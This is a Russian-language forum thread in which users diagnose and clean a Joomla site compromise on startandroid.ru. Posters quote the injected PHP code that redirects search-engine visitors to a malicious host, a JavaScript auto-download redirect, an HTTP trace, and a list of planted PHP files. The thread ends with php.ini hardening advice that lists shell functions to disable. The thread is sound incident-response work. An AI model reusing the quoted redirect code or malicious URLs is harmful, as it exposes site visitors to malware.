Страница 1 из 1

Startandroid.ru фишинговые ссылки?

Добавлено: 19 июн 2014, 18:21
Donart
Если перейти по ссылке вверху или вбить в адресной строке startandroid.ru, то все норм, но если попытаться зайти из google прилетает это
Изображение

Через 5 секунд мне предлагают установить
Изображение

FireFox говорит это, причем видно, как идет куча переадресаций. Адрес открытой страницы может меняться.
Изображение

LinuxMint 17. Сомневаюсь что дело во мне :?

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 19 июн 2014, 22:16
rezak90
Donart писал(а):LinuxMint 17. Сомневаюсь что дело во мне :?
Проблема у тебя. Потому что у меня все ОК ;)

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 09:21
Mikhail_dev
Проверил. Все в порядке.

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 10:27
altwin
Все работает, проблема в вашем браузере, а вообще таких скриншотов я сколько угодно могу сделать... вот к примеру какой странный вопрос мне google-chrome сегодня задал:
ИзображениеИзображение

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 11:19
Donart
Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 11:32
anber
Donart писал(а):Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.
Да, я яндекс предупреждает, это факт. У меня был случай когда на моем сайте писалась такая дрянь. В итоге после 2-х месячного разбирательства выяснилось что проблема (вирус) был у хостера, но он в упор отказывался это признать.

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 11:52
altwin
Donart писал(а):Ну незнаю, я вроде все проверил, практически с нуля Linux. Это единственный сайт который у меня так глючит. Меня это не сильно напрягает, это я больше для модератора постил. Выдача результатов яндекса с ссылками на startandroid.ru сразу сообщает "Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных" и "Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации." Как это может быть с моей стороны незнаю.
Хорошо бы сразу говорить о том, что это yandex.. я к примеру никогда им не пользовался, но да результат поиска:
Учебник по Андроид. Уроки для начинающих
startandroid.ru
О сайте. Сайт startandroid.ru посвящен обучению разработке приложений под Android. Подробнее...

Сайт может представлять угрозу
Посещение этого сайта может привести к заражению компьютера или мобильного устройства вредоносными программами, использованию его без вашего ведома, а также к порче или краже ваших данных. Почему?
Посмотреть сохранённую безопасную копию
Это не угрожает вашему компьютеру и данным
Всё равно перейти на эту страницу
Переход по ссылке может нанести вред вашему компьютеру или мобильному устройству
Что харрактерно yahoo и bing, тоже говорят о malware и молчит только google и к примеру avgthreatlabs.com говорит: Currently Safe
No active malware was reported recently by users anywhere on this website.... Но что интересно, лично я мало верю yandex ;)

P.S. но yandex ПРАВ :) известный javascript redirect на сайте...

ISSUE DETECTED DEFINITION INFECTED URL
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/uroki.html ( View Payload )
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/uroki/vse-uroki-spiskom.html ( View Payload )
Website Malware mw-redirection121?v3 http://startandroid.ru/ru/articles/listofarticles.html ( View Payload )
Known javascript malware. Details: http://labs.sucuri.net/db/malware/mw-redirection121?v3
Location: http://alfsystem.com.my/includes/domit/1.php
P.S. а я говорил, нефик joomla баловаться и нужно использовать как минимум laravel, а лучше django или rails))))
но всеравно:
MalwareDomainList - domain is Clean.
Google-SafeBrowsing - domain is Clean.
MalwareDomainList - domain is Clean.

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 13:29
Mikhail_dev
Короче, мы жить будем или нет?

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 14:06
rezak90
Mikhail_dev писал(а):Короче, мы жить будем или нет?
Вы нет. Бэндеры до вас доберутся =)

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 14:18
Mikhail_dev
И до тебя значит тоже, хох.

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 14:20
damager82
Кто знает как лечить? Поубирал пока все рекламные скрипты со стартовой.

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 14:31
altwin
Mikhail_dev писал(а):Короче, мы жить будем или нет?
да все ок, мне пришлось оперу качать, чтобы проверить.. не пашет в моих браузерах оно ) там из css грузится всякая фигня
в ней js который и редиректит, просто удалить хлам и все. В детали я не вдавался. Я так понял пришло оно отсюда - http://zopla.net/l/JjVWLGqfTfuLId68I3AMBnosz3 и скорее всего из какой -то рекламы. Либо же фиг его знает, нужно профайлер запускать. В общем суть в том, что идет редирект на http://alfsystem.com.my/includes/domit/1.php при условии что это переход по ссылке т.е. есть parent окно. И это проблема либо хостера либо шаблона ja_purity_ii

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 15:18
altwin
damager82 писал(а):Кто знает как лечить? Поубирал пока все рекламные скрипты со стартовой.
Можно попробывать поискать в js часть кода устанавливаюущую window.googleJavaScriptRedirect=1, вроде как 0 должно быть, но проще использовать сервисы вроде - http://sitecheck.sucuri.net/results/startandroid.ru
Там можно и просканировать и почистить

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 15:33
altwin
прикол весь в том, что этот адрес приходит в ответ от сервера при условии указания Referer:
GET http://startandroid.ru/

302 Found
Request
GET / HTTP/1.1
User-Agent: Opera/9.80 (X11; Linux x86_64) Presto/2.12.388 Version/12.16
Host: startandroid.ru
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://www.google.com.ua/url?sa=t&rct=j ... 0JUTkkqQIQ
Cookie: ja_purity_ii_tpl=ja_purity_ii; 56a2310a275ea871d4a200f1af00b766=ab020b75f845e2a4a582a9e3523fb103; _ga=GA1.2.1192279240.1403264439; e21b278b1e246d6eaee3ccf5b602f8cb=ru-RU
Connection: Keep-Alive

Response
HTTP/1.1 302 Found
Server: nginx/1.4.4
Date: Fri, 20 Jun 2014 12:24:52 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Connection: keep-alive
X-Powered-By: PHP/5.3.18
Location: http://alfsystem.com.my/includes/domit/1.php

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 15:43
altwin
Как варриант... судя по этому
[syntax=javascript]var meta_refresh = document.getElementById('meta_refresh');
meta_refresh.content = '';
meta_refresh.parentNode.removeChild(meta_refresh);
(function() {
if (top.frames.length != 0) {
top.location = self.document.location;
}
var DOMReady = function(a, b, c) {
b = document, c = 'addEventListener';
b[c] ? b[c]('DOMContentLoaded', a) : window.attachEvent('onload', a)
}
DOMReady(function() {
var interval;
interval = setInterval(function() {
clearInterval(interval);
location.href = "http://zopla.net/download?midlet_id=21& ... ent&auto=1";
}, parseInt(5) * 1000);
var cancelInterval = function() {
clearInterval(interval);
};
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
if (links.addEventListener) {
links.addEventListener('click', cancelInterval, false);
}
else if (links.attachEvent) {
links.attachEvent('onclick', cancelInterval);
}
}
});
})()/*-->*/[/syntax]
для редиректа используется <meta> тег, на сколько я помну Location из php имеет больший приоритет, что если просто установить редирект на стартовую страницу из нее же отсекая referer -a, ну или же просто в качестве стартовой установить страницу index.php из которой просто руками послать заголовки без реферера.. пусть эта вирусня живет себе, всеравно ничего сделать не сможет ))

P.S. кстати если это не реклама - вполне может быть виджет Vk принес каку.

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 23:38
rezak90
Какой ужас. Я теперь не с одного браузера не могу войти. Даже с гугля. Приходиться заходить с телефона!

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 23:38
damager82
Нашел вот такую хрень. Была закодирована в файле
public_html\includes\defines.php
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alfsystem.com.my/includes/domit/1.php");
exit();
}
}
}
Я так понимаю - это основной источник проблем?

И еще несколько левых PHP-файлов посносил, типа
"public_html\components\com_users\1t9nn9.php"
"public_html\components\a.php"
"public_html\components\hfr339.php"
"public_html\components\movie.php"
"public_html\components\n0if80.php"

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 20 июн 2014, 23:39
damager82
rezak90 писал(а):Какой ужас. Я теперь не с одного браузера не могу войти. Даже с гугля. Приходиться заходить с телефона!
У меня хром открывает, если нажать Дополнительно и На свой страх и риск

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 21 июн 2014, 01:48
rezak90
Да я так само уже открываю)) но все же каждый раз не очень удобно.
P.S. наш сайт тоже ломанули :(

Re: Startandroid.ru фишинговые ссылки?

Добавлено: 21 июн 2014, 08:17
altwin
damager82 писал(а):Нашел вот такую хрень. Была закодирована в файле
public_html\includes\defines.php
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer) or preg_match ("/google\.(.*?)\/url\?sa/",$referer) or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
header("Location: http://alfsystem.com.my/includes/domit/1.php");
exit();
}
}
}
Я так понимаю - это основной источник проблем?

И еще несколько левых PHP-файлов посносил, типа
"public_html\components\com_users\1t9nn9.php"
"public_html\components\a.php"
"public_html\components\hfr339.php"
"public_html\components\movie.php"
"public_html\components\n0if80.php"
да очень похоже, условия совпадают, учитывает реферера и редирект именно на тот сайт, поздравляю :)
вывод установить в php.ini
register_globals=Off
safe_mode=Off
allow_url_fopen=Off
allow_url_include=Off
disable_functions=show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open
open_basedir=полный путь к вашей директории
сменить права доступа на папки и ограничить доступ к ftp по IP, лучше вообще закрыть и пользоваться ssh. Да и вообще нужно полностью на https переходить.